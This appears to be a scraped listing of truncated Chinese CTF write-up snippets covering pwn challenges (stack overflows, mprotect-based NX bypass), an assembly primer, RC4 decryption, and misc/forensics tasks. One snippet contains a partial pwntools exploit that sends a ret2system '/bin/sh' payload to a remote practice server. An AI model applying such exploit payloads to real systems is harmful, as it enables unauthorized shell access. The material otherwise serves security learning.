pwn51 32位 反编译后傻眼了 是C++ 看不太懂，靠着string界面找到了主要函数sub_8049059 int sub_8049059(){  int v0; // eax  int v1; // eax  unsigned int v2; // eax  int v3; // eax  …

pwn50 [*] 'C:\\Users\\26597\\Desktop\\pwn50'    Arch:       amd64-64-little    RELRO:      Partial RELRO    Sta…

32位 NX开启 提示mprotect mprotect()函数可以修改调用进程内存页的保护属性 所以利用mprotect函数，就可以绕过NX 从而达到写入shellcode的目的 int ctfshow(){  _BYTE v1[14]; // [esp+6h] [ebp-12h] BYREF​  re…

签到题2 exp: from pwn import *u=remote("node1.anna.nssctf.cn",28532)call_system=0x08048641bin_sh=0x0804863Apayload=b'a'*(0x64+4)+p32(call_system)+p32(0x0)+p32(bin_sh)u.sendline(p…

PWN——CTFshow pwn39 一个32位程序 Arch:       i386-32-littleRELRO:     Partial RELROStack:     No canary foundNX:         NX en…

一、汇编语言简介 汇编语言是计算机硬件与高级语言之间的桥梁，它直接操作计算机的硬件资源。在CTF的Pwn方向中，汇编语言是理解程序底层运行机制和漏洞利用的关键工具。以下内容主要基于x86和x86_64架构展开。 二、基础汇编指令 1. 数据传输指令 mov：用于数据的移动。例如：mov eax, 1          ; 将立即数1赋值给寄存器ea…

ATTACK续 alert 进入题目环境，得到的是一个空白页面，只有一个提示框在反复出现 法1 用view-source协议，查看源码 翻阅发现底下有行小字 flag{3d527&…

九九归一 打开附件 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 44 77 41 41 41 41 38 41 51 41 41 41 41 41 53 68 2b 54 66 41 41 41 41 55 45 6c 45 51 56 52 …

Easy 根据给出的加密算法和密文 编写一个解密程序 def rc4(key, data):    key_length = len(key)    s = list(range(256))    j = 0    for i in range(256):  …

Easy_Data Flag得分： 28.47 得分次序： 140 公司的DLP软件报警了，并上传了一段流量。你能帮bob分析下为什么会产生报警么？ misc_easy_data下载 5G网络隐私保护 213.33PT 新技术应用 Flag得分： 380 得分次序： 67 Get_supi 在某些场景下，LTE网络中用户的IMSI会在空口暴露，5G…